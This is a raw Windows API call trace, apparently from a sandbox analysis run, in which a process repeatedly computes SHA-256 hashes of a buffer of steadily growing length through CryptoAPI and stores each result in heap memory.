	[0207.819] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0207.819] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0638
	[0207.819] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0638, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0638, pdwDataLen=0x129364) returned 1
	[0207.819] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.819] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.819] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.819] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.819] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0207.819] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.819] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0660
	[0207.819] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0660, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0660, pdwDataLen=0x129364) returned 1
	[0207.819] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.819] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.819] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.819] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.820] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0207.820] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0688
	[0207.820] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0688, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0688, pdwDataLen=0x129364) returned 1
	[0207.820] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.820] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.820] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.820] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.820] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0207.820] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b06b0
	[0207.820] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b06b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b06b0, pdwDataLen=0x129364) returned 1
	[0207.820] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.820] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.820] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.820] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.821] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0207.821] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.821] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b06d8
	[0207.821] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b06d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b06d8, pdwDataLen=0x129364) returned 1
	[0207.821] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.821] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.821] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.821] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.821] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0207.821] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.821] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0700
	[0207.821] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0700, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0700, pdwDataLen=0x129364) returned 1
	[0207.821] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.821] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.821] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.821] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.822] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0207.822] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0728
	[0207.822] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0728, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0728, pdwDataLen=0x129364) returned 1
	[0207.822] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.822] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.822] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.822] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.822] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0207.822] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0750
	[0207.822] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0750, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0750, pdwDataLen=0x129364) returned 1
	[0207.822] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.822] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.822] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.823] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.823] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0207.823] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0778
	[0207.823] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0778, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0778, pdwDataLen=0x129364) returned 1
	[0207.823] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0207.823] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.823] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0207.823] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0207.823] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0207.823] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0207.823] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07a0
	[0207.823] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b07a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b07a0, pdwDataLen=0x129364) returned 1
	[0207.823] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0207.823] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0207.823] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.011] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.011] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0208.011] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07c8
	[0208.011] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b07c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b07c8, pdwDataLen=0x129364) returned 1
	[0208.011] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.012] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.012] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.012] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.012] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0208.012] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b07f0
	[0208.012] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b07f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b07f0, pdwDataLen=0x129364) returned 1
	[0208.012] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.012] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.012] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.013] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.013] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0208.013] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0818
	[0208.013] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0818, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0818, pdwDataLen=0x129364) returned 1
	[0208.013] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.013] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.013] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.013] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.013] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0208.013] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0840
	[0208.013] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0840, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0840, pdwDataLen=0x129364) returned 1
	[0208.013] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.013] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.013] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.014] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.014] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0208.014] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0868
	[0208.014] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0868, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0868, pdwDataLen=0x129364) returned 1
	[0208.014] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.014] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.014] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.014] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.014] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0208.014] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0890
	[0208.014] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0890, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0890, pdwDataLen=0x129364) returned 1
	[0208.014] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.014] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.014] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.015] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.015] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0208.015] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b08b8
	[0208.015] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b08b8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b08b8, pdwDataLen=0x129364) returned 1
	[0208.015] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.015] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.015] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.015] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.015] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0208.015] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b08e0
	[0208.015] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b08e0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b08e0, pdwDataLen=0x129364) returned 1
	[0208.015] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.015] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.016] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.016] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.016] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0208.016] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0908
	[0208.016] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0908, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0908, pdwDataLen=0x129364) returned 1
	[0208.016] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.016] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.016] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.016] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.016] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0208.017] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0930
	[0208.017] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0930, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0930, pdwDataLen=0x129364) returned 1
	[0208.017] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.017] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.017] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.017] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.017] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0208.017] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0958
	[0208.017] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0958, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0958, pdwDataLen=0x129364) returned 1
	[0208.017] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.017] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.017] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.018] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.018] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0208.018] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0980
	[0208.018] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0980, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0980, pdwDataLen=0x129364) returned 1
	[0208.018] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.018] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.018] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.018] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.018] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0208.018] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b09a8
	[0208.018] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b09a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b09a8, pdwDataLen=0x129364) returned 1
	[0208.018] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.018] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.018] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.019] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.019] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0208.019] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b09d0
	[0208.019] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b09d0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b09d0, pdwDataLen=0x129364) returned 1
	[0208.019] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.019] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.019] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.019] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.019] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0208.019] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b09f8
	[0208.019] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b09f8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b09f8, pdwDataLen=0x129364) returned 1
	[0208.019] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.019] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.019] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.020] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.020] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0208.020] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0a20
	[0208.020] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0a20, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0a20, pdwDataLen=0x129364) returned 1
	[0208.020] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.020] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
